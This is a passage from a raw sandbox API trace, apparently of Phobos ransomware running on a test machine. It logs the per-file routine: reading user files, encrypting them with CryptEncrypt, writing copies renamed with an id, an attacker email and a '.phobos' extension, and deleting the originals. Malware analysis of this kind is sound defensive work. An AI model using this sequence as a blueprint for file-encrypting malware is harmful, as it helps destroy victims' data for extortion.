(in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=719) returned 1 [0198.584] CloseHandle (hObject=0x160) returned 1 [0198.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties")) returned 0x2020 [0198.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.584] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0198.584] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0198.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.774] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ce8) returned 1 [0198.774] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.774] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2cf, lpOverlapped=0x0) returned 1 [0198.786] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2d0) returned 1 [0198.786] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2d0, lpOverlapped=0x0) returned 1 [0198.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0198.788] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.788] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0198.788] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.788] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0198.788] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.788] CloseHandle (hObject=0x160) returned 1 [0198.788] CloseHandle (hObject=0x16c) returned 1 [0198.788] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties")) returned 1 [0198.789] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0198.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.789] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=906752) returned 1 [0198.790] CloseHandle (hObject=0x16c) returned 1 [0198.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi")) returned 0x2020 [0198.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.790] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0198.790] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0198.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0198.888] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.888] ReadFile (in: hFile=0x16c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xdd600, lpOverlapped=0x0) returned 1 [0198.958] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xdd610, dwBufLen=0xdd610 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xdd610) returned 1 [0198.966] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xdd610, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xdd610, lpOverlapped=0x0) returned 1 [0198.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0198.982] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.982] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0198.982] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.982] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0198.982] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.982] CloseHandle (hObject=0x16c) returned 1 [0198.983] CloseHandle (hObject=0x15c) returned 1 [0198.983] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi")) returned 1 [0198.992] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0198.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.022] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=933) returned 1 [0199.022] CloseHandle (hObject=0x15c) returned 1 [0199.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl")) returned 0x2020 [0199.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.022] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.022] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.032] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.032] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3a5, lpOverlapped=0x0) returned 1 [0199.061] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3b0, dwBufLen=0x3b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3b0) returned 1 [0199.061] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3b0, lpOverlapped=0x0) returned 1 [0199.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0199.064] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.064] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0199.064] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.064] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x132, lpOverlapped=0x0) returned 1 [0199.064] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.064] CloseHandle (hObject=0x15c) returned 1 [0199.064] CloseHandle (hObject=0x130) returned 1 [0199.064] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl")) returned 1 [0199.065] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.066] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=37703) returned 1 [0199.066] CloseHandle (hObject=0x130) returned 1 [0199.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl")) returned 0x2020 [0199.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.067] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.067] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.067] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.067] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9347, lpOverlapped=0x0) returned 1 [0199.106] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9350, dwBufLen=0x9350 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9350) returned 1 [0199.106] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x9350, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x9350, lpOverlapped=0x0) returned 1 [0199.107] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0199.107] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.107] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0199.107] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.108] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x132, lpOverlapped=0x0) returned 1 [0199.108] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.108] CloseHandle (hObject=0x130) returned 1 [0199.108] CloseHandle (hObject=0x15c) returned 1 [0199.108] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl")) returned 1 [0199.109] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.110] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1447) returned 1 [0199.110] CloseHandle (hObject=0x15c) returned 1 [0199.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk")) returned 0x20 [0199.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.110] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.110] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.111] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.111] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5a7, lpOverlapped=0x0) returned 1 [0199.126] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0199.126] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0199.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.127] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.127] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.127] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.127] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, 